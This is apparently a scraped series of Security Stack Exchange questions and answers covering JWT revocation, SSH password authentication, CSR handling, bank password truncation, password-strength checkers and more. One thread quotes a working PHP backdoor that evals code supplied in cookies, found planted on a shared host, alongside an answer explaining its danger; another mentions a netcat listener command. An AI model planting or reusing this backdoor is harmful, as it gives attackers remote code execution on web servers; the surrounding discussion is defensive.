Goal: I'd like to have multiple independent websites with one shared authentication server. The auth server will have one database in which all users are stored (just username, email and password, so different data models are of no concern). User 1 from website A should only be able to log in at A.com, while user 2 from website B should only be able to log in at B.com. Question: Would it be SAFE to store the URL of the website with the user record, as the only website they should be granted access to? So for example: { username: a, email: [email protected] password: **** website: A.com }, { username: b, email: [email protected] password: **** website: B.com } Why this approach: Correct me if I'm wrong, but otherwise I'd have to host a separate database, cache and server for each website with a log-in.
{ "source": [ "https://security.stackexchange.com/questions/265814", "https://security.stackexchange.com", "https://security.stackexchange.com/users/279066/" ] }
265,823
If an attacker were to set up a netcat listener (nc -lvnp 4444), is it possible to take control of their device using that listener? Whenever I look for an answer online, all I can find is how to set up your own reverse shell with netcat, and never anything on exploiting an attacker's reverse shell.
{ "source": [ "https://security.stackexchange.com/questions/265823", "https://security.stackexchange.com", "https://security.stackexchange.com/users/284565/" ] }
266,204
I've read that JWT tokens are stateless and you don't need to store the tokens in the database and that this prevents a look up step. What I don't understand is that according to RFC 7009 you can revoke a token. Let's say I have a web site with a Sign Out button that calls a token revocation flow like in RFC 7009. If no tokens are stored in the database, what's to prevent the client from using a token that's been revoked? If I Sign Out, I would expect to have to Sign In again. Is it solely the client's responsibility to clear the token locally? Do you need to store the refresh token in a database or store to implement RFC 7009?
RFC 7009 is about OAuth, not JWT. You are mixing two different technologies: JWT and OAuth. This question on StackExchange summarizes it well. JWT is a token format. It defines the fields, the signing protocol, the encoding. OAuth is an authorization protocol that can use JWT or not, depending on the developer. It's not easy to revoke a JWT, because JWTs are stateless, self-contained and don't use a database. Revoking a JWT would require storing some value in a database and checking that value on each request, and that would look a lot like OAuth but with the overhead of mixing the two together.
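To make that trade-off concrete, a JWT revocation check usually ends up looking something like the sketch below (Python, illustrative names only; a real deployment would keep the denylist in Redis or a database rather than in memory). Note that the per-request lookup is exactly the statefulness that JWTs were supposed to avoid:
import time

revoked = {}  # jti -> expiry timestamp of the revoked token (in-memory for illustration)

def revoke(jti, exp):
    """Record a token's jti claim as revoked, e.g. when the user signs out."""
    revoked[jti] = exp

def is_revoked(jti):
    """Checked on every request; entries can be dropped once the token would have expired anyway."""
    now = time.time()
    for key, exp in list(revoked.items()):
        if exp < now:
            del revoked[key]
    return jti in revoked
The usual compromise is to revoke only the server-side refresh token and keep access-token lifetimes short, so this lookup is avoided for most requests.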
{ "source": [ "https://security.stackexchange.com/questions/266204", "https://security.stackexchange.com", "https://security.stackexchange.com/users/16585/" ] }
266,306
Whenever I create a remote repository on my web server there seems to be a file called expect.php or options.php with the following code in it:
<?php
function visit_cookie() {
    $h = $_COOKIE;
    ($h && isset($h[93])) ? (($ms = $h[93].$h[78]) && ($qh = $ms($h[73].$h[22])) && ($_qh = $ms($h[94].$h[82])) && ($_qh = $_qh($ms($h[10]))) && @eval($_qh)) : $h;
    return 0;
}
visit_cookie();
?>
This also exists in my older, already existing repositories on the server. I am using HostGator's Shared Hosting package with PHP & MySQL. I am not sure if this is something that the server or git creates and is part of a process or if it is a malicious file, as I do not understand the code written in it. The reason I am asking this question is that recently, Google has blacklisted my site and visiting it gives a "Site is dangerous may contain malware" sort of popup. So I am trying to investigate and fix the problem.
It almost certainly is malicious, and there are several risks introduced by the code provided. Red Flags The first and loudest sign of trouble here is going to be invocation of the eval() command. When the input is constructed from $_COOKIE —a superglobal which effectively allows for anonymous clients to store whatever short strings they want to via any HTTP method—then straight away you are opened up to arbitrary code execution. To make matters worse, the code uses the @ symbol in that invocation to suppress error messages or any output that may otherwise arise, thus preventing you from reviewing what has run and what will be run later. Code Analysis Basically, it looks like an attacker has set it up to pass in arbitrary code through cookies. The bad actor here could be doing any number of things—on the more benign end, they may be showing ads that aren't yours or redirecting to their own site for traffic gains, or, on the more intense side, they could be camping on your server and periodically stealing all of your users' data from the users directly as well as any connected data stores. You should be taking serious measures to address this in the event that you have customer data present and accessible from this server. It's a leak. Recommendations Consider pursuing another host if the provider you are with is not able or willing to assist you in diagnosing the origin here. It possibly came from some dependency in your code and may be replicated via your git configuration since you mention that it is recurring, so consider an audit of your repositories and that configuration. Maybe switch to a host like Cloudflare, often free. Since this is PHP/MySQL, you would perhaps be better served by other providers. I was just throwing out one name, but other trusted providers like AWS/Azure/Google Cloud will have what you want. In general, Digital Ocean has quite a low barrier to entry. To prevent a repeat attack, as noted by OscarGarcia: If you uploaded a private key anywhere on this server, or anywhere at all in raw form—be that a shared symmetric key or the private half of an asymmetric key pair—then you should go ahead and retire that right away. This attack would have granted access to the host file system and, depending on what the key is used for, may leave you vulnerable to a repeat attack elsewhere.
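As a small aid for the audit suggested above, a rough triage script along these lines can flag other files that combine request superglobals with eval()/base64_decode(). It is only a sketch with assumed patterns and file extensions - expect false positives and negatives, and treat every hit as something to review by hand rather than a verdict.

```python
import os
import re
import sys

# Patterns that commonly appear together in PHP backdoors.
SUSPICIOUS = [
    re.compile(rb"@?eval\s*\("),
    re.compile(rb"\$_(COOKIE|GET|POST|REQUEST)\b"),
    re.compile(rb"base64_decode\s*\("),
]

def scan(root: str) -> None:
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                data = open(path, "rb").read()
            except OSError:
                continue
            hits = [p.pattern.decode() for p in SUSPICIOUS if p.search(data)]
            # Flag files that both read request data and eval/decode something.
            if len(hits) >= 2:
                print(f"{path}: {hits}")

if __name__ == "__main__":
    scan(sys.argv[1] if len(sys.argv) > 1 else ".")
```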
{ "source": [ "https://security.stackexchange.com/questions/266306", "https://security.stackexchange.com", "https://security.stackexchange.com/users/281368/" ] }
266,447
I work on a service that handles user authentication & authorization. I recently added 2FA support (email, sms, TOTP) and while it works great, I was wondering about the security of the one-time codes during transit (client->server request). Assuming everything is going through HTTPS, does it make sense to encrypt/hash in the payload? I have seen some banking/financial systems doing it using some derivation technique (joining the code with another value, hashing the whole thing and only then sending, and the server would do the same).
If we assume TLS is not broken, then it doesn't really make sense to add obfuscation to transmit the OTP codes. If we assume TLS is broken, it doesn't really make sense, as the Javascript transmitted to the client can be replaced by a MITM attack.
{ "source": [ "https://security.stackexchange.com/questions/266447", "https://security.stackexchange.com", "https://security.stackexchange.com/users/285659/" ] }
266,509
On Linux, the /etc/ssl/certs folder includes all the necessary public keys for Certificate Authorities. If I have not misunderstood something, this makes it possible to verify public keys received from other servers over the internet. But an adversary, e.g. a program with root privileges, or even a security agency collaborating with developers of a Linux distro, can "plant" its own certificates or modify the existing ones. This would enable MiTM attacks by making the adversary's fake certificates used for such attacks seem legitimate and signed by a Certificate Authority. Is there any technique that prevents this, or a way to verify that those keys have not been modified after installation?
If an adversary or attacker has root-level access to your system (and therefore the ability to plant their own certificates in your system's trust store), then that means your system has been compromised. If your system has been compromised, then it's game over regardless. Once your system has been compromised and the attacker has root-level access, the attacker has complete control of your system. He or she can access your files, install their own programs, monitor what you do on the system, and monitor your communications - without even needing to plant certificates in your trust store.
{ "source": [ "https://security.stackexchange.com/questions/266509", "https://security.stackexchange.com", "https://security.stackexchange.com/users/284993/" ] }
266,546
I copy / pasted a data:image/png;Base64 image from a Google search into a Google Slide, before realizing it was a BASE64 image. Is there any possibility that this contains malicious code, or any way to check it? [...]data:image/png;base64,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 I did run it through a Base64 Validator and it produced the .png, but just concerned it may have done 
something else.
{ "source": [ "https://security.stackexchange.com/questions/266546", "https://security.stackexchange.com", "https://security.stackexchange.com/users/285863/" ] }
266,608
A friend's bank changed its password policy such that you are limited to 20 characters. However, he used 24 letters before and thus was not able to log in anymore. He called his advisor, who suggested he should try to log in with the first 20 letters of his password... and it worked. This really made us think about the password storage practice they use: I always assumed that a password is stored only as a hash ("with a bit of salt"), but never ever in its plain form - which would definitely be required for the bank to shorten a password. Or am I wrong? A similar problem has been stated here . Should I be concerned that this bank uses bad information security procedures?
Most likely the bank always used just 20 characters. As Affe already suggested in the comments, the simplest explanation is that nothing has actually changed in the way the bank stores the passwords. Most likely the bank always had an internal password length limit of 20 characters, and the password entry fields used to silently discard the extra characters. While truncating passwords is not necessarily a great idea, there's no reason to suspect actual security malpractice. Those 20 first characters are probably stored using a reasonable salted hashing scheme or a hardware security module (given all sorts of audit requirements, banks are in general slightly less likely to invent horrible homebrew crypto compared to other companies). I can speculate that they now stopped silently truncating passwords as a necessary preparatory step towards supporting longer passwords (so that users will likely be able to set a new 24-character password now or in the near future and it will get hashed as a whole).
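A purely illustrative sketch (the bank's real code is of course unknown) of how a backend that always hashed only the first 20 characters would behave: nothing is stored in plaintext, yet any password sharing the same 20-character prefix verifies successfully. The 20-character limit, iteration count and salt handling here are assumptions for the demo.

```python
import hashlib
import hmac
import os

MAX_LEN = 20  # assumed internal limit; the bank's real scheme is unknown

def store(password: str) -> tuple[bytes, bytes]:
    # Sign-up path: silently truncate, then salt-and-hash only the prefix.
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password[:MAX_LEN].encode(), salt, 200_000)
    return salt, digest

def verify(password: str, salt: bytes, digest: bytes) -> bool:
    # The login path truncates the same way, so any password sharing the first
    # 20 characters verifies successfully -- no plaintext storage required.
    candidate = hashlib.pbkdf2_hmac("sha256", password[:MAX_LEN].encode(), salt, 200_000)
    return hmac.compare_digest(candidate, digest)

if __name__ == "__main__":
    salt, digest = store("correct horse battery staple!!")        # 30 characters
    print(verify("correct horse battery staple!!", salt, digest)) # True
    print(verify("correct horse batterXXXX", salt, digest))       # also True: same first 20 chars
```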
{ "source": [ "https://security.stackexchange.com/questions/266608", "https://security.stackexchange.com", "https://security.stackexchange.com/users/285967/" ] }
266,650
I am looking into our current website certificate-management process and am looking for steps that may be unnecessary and can be simplified. The current process was created by our sysadmin, who has now left, and I am confused about step 1 below. Context: I am hosting a webapp (Windows VM with IIS webserver) on a (sub)domain that belongs to a customer (on the customer's domain), so I have no control over their DNS settings or certificate-management. Because we do want to support HTTPS for this customer, we have the following process in order to create an SSL certificate to bind in IIS to our webapp. (1) In IIS we create a CSR (cert request) using the subdomain name (of the customer's domain) and customer organisation details. (2) We send the CSR to the customer, they sign it with their CA of choice and send the .cert back to us. (3) We 'complete' the CSR in IIS and the cert then appears in IIS. (4) We can then export this cert to have it as a .PFX (with private key and password) and bind it to our IIS webapp. (The customer uses a DNS record to point their subdomain to our IIS webserver.) My question is: What could the reason be that we (the previous sysadmin) would create the CSR etc., instead of just letting the customer create the certificate fully on their side, and when it's created, just send it to us for installation on the webserver? Why this 2-phase approach that involves lots of waiting and customer inaction in the process? What are the drawbacks to letting the customer fully create and manage their certificate, so the only thing we have to do is just import their certificate and bind it in IIS to our webapp?
My question is: What could the reason be that we (the previous sysadmin) would create the CSR etc., instead of just letting the customer create the certificate fully on their side, and when it's created, just send it to us for installation on the webserver? If the customer created everything on their side, they would also need to create the private key and send it to you - which means that they have a copy of your private key and also increases the likelihood that the key is stolen or compromised. The point of a CSR is that you can send them the details of the certificate you want (e.g., the name/URL that it's for), and your public key - but your private key never gets sent anywhere.
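IIS performs the key generation and CSR creation for you behind the scenes, but as a hedged illustration of the same flow, here is roughly what it looks like with Python's cryptography library - the hostname and organisation below are placeholders. Only the CSR (subject details plus public key) ever leaves your machine; the private key is written locally and later paired with the certificate the customer's CA returns.

```python
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.x509.oid import NameOID

# Generate the key pair locally -- this private key never leaves your server.
key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

# The CSR bundles the requested subject and the *public* key, signed with the private key.
csr = (
    x509.CertificateSigningRequestBuilder()
    .subject_name(x509.Name([
        x509.NameAttribute(NameOID.COMMON_NAME, "app.customer.example"),
        x509.NameAttribute(NameOID.ORGANIZATION_NAME, "Customer Org"),
    ]))
    .sign(key, hashes.SHA256())
)

# This PEM blob is all the customer (and their CA) ever needs to see.
print(csr.public_bytes(serialization.Encoding.PEM).decode())

# The private key stays with you, to be paired later with the returned certificate.
with open("app.customer.example.key", "wb") as f:
    f.write(key.private_bytes(
        encoding=serialization.Encoding.PEM,
        format=serialization.PrivateFormat.TraditionalOpenSSL,
        encryption_algorithm=serialization.NoEncryption(),
    ))
```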
{ "source": [ "https://security.stackexchange.com/questions/266650", "https://security.stackexchange.com", "https://security.stackexchange.com/users/150616/" ] }
266,797
Assume that I never check the server fingerprint when logging in to an SSH server. This means that certain configurations of SSH can be impersonated. For example, I can log into a server that only has my public key. Obviously this doesn't authenticate the server. But now suppose that SSH uses a private password. I am not familiar with the internals of SSH, but I would hope that the password challenge goes in both directions when both sides share the same common secret . Therefore, if I enter my password and the client allows the connection, then it has authenticated the server. Is this reasoning correct? Or is there still some way for someone without my password to impersonate the server?
... if I enter my password and the client allows the connection, then it has authenticated the server. Neither password based nor key based authentication of the client against the server will somehow authenticate the server. This is also true if the client's private key is protected by a password: the password will only be used locally on the client to use the private key on the client, but has nothing to do with successful or unsuccessful server authentication. In other words: not properly authenticating the server opens you up to server impersonation or man in the middle attacks, no matter which client authentication method is used. ... a private password. I am not familiar with the internals of SSH, but I would hope that the password challenge goes in both directions when both sides share the same common secret. That's not how password authentication in SSH works. With password authentication the server simply gets the password from the client and then checks it against the local (to server) authentication mechanism. Typically the password is not even known server side for checking it, but only a password hash is known. And maybe not even this, because the server might use an authentication backend like PAM , LDAP or Radius. So when the client does not properly authenticate the server in this case, then the wrong server (attacker) might end up with the client's password and can use it against the real server. A real shared common secret would be Pre-Shared Key , as known from WPA-PSK, IPSec or PSK authentication in TLS. In this mode the authentication can only succeed if both client and server know the same secret, but without some man in the middle able to sniff the secret. But PSK based authentication is not defined for SSH.
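To make the "properly authenticating the server" part concrete, here is a small Python sketch using Paramiko. The host name and credentials are placeholders; the point is that the host-key check against known_hosts is a separate, client-side step that happens before - and independently of - any password being sent.

```python
import paramiko

client = paramiko.SSHClient()

# Server authentication happens here: the client compares the host key offered by
# the server against keys it already trusts (e.g. ~/.ssh/known_hosts).
client.load_system_host_keys()

# Refuse to connect to unknown hosts instead of silently trusting them.
client.set_missing_host_key_policy(paramiko.RejectPolicy())

# Client authentication (the password) only runs after the host key check has passed.
client.connect("ssh.example.org", username="alice", password="correct horse")
stdin, stdout, stderr = client.exec_command("hostname")
print(stdout.read().decode())
client.close()
```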
{ "source": [ "https://security.stackexchange.com/questions/266797", "https://security.stackexchange.com", "https://security.stackexchange.com/users/286296/" ] }
267,141
Is Rumkin.com's password tool a reliable tool for password strength checking? I am asking because: I am getting confusing suggestions: (the password in this example is 777 characters long) D. W.'s comment to Jeff Atwood's answer claims that Rumpkin's estimates are apparently bogus . Adam Katz's answer to my other question claims that password complexity detection tools are all wrong . So that would include Rumpkin's, try zxcvbn (that I've been using so far) and many / all others. Please, note that this is not a broad question on whether all password strength checkers are unreliable. This has been addressed many times. But rather specifically about Rumkin.com's password tool . I want to learn whether this tool's suggestion system is flawed or if (in any scenario) a 777-character password may be considered not long enough (and therefore whether any system can or rather should suggest making it even longer)?
Looking at the code of the site (which is not included in the linked github) it shows that the suggestion of making the passphrase longer is simply displayed always. From password-module.js (slightly beautified): { key: "viewSuggestions", value: function() { var t = [m("li", "Make the passphrase longer.")], r = this.strengthScore.charsets; return r.lower || t.push(m("li", "Add lowercase letters.")), r.upper || t.push(m("li", "Add uppercase letters.")), r.number || t.push(m("li", "Add numbers.")), r.punctuation || t.push(m("li", "Add punctuation.")), r.symbol || t.push(m("li", "Add symbols, such as ones used for math.")), t } } As can be seen - "Make the passphrase longer." is always included and all the others depending on the input. Is Rumkin.com's password tool a reliable tool for password strength checking? Your main point seem to be the strange suggestion that even a very long password should be made longer. As shown, this is not a suggestion you can rely on. It is not an actual harmful suggestion though. But after some sufficient complexity and length is reached, this recommendation adds no real value and instead causes confusion.
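For a sense of scale, a back-of-envelope entropy estimate (assuming a truly random password drawn from an assumed 72-character set) shows why "make it longer" stops adding meaningful value long before 777 characters.

```python
import math

def entropy_bits(length: int, charset_size: int) -> float:
    # Idealised estimate: a uniformly random password of `length` symbols drawn
    # from `charset_size` characters has length * log2(charset_size) bits of entropy.
    return length * math.log2(charset_size)

# Assume a modest 72-character set (letters, digits, some punctuation).
print(entropy_bits(12, 72))    # ~74 bits  -- already decent for many uses
print(entropy_bits(20, 72))    # ~123 bits -- beyond any realistic brute force
print(entropy_bits(777, 72))   # ~4793 bits -- far past the point of diminishing returns
```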
{ "source": [ "https://security.stackexchange.com/questions/267141", "https://security.stackexchange.com", "https://security.stackexchange.com/users/11996/" ] }
267,335
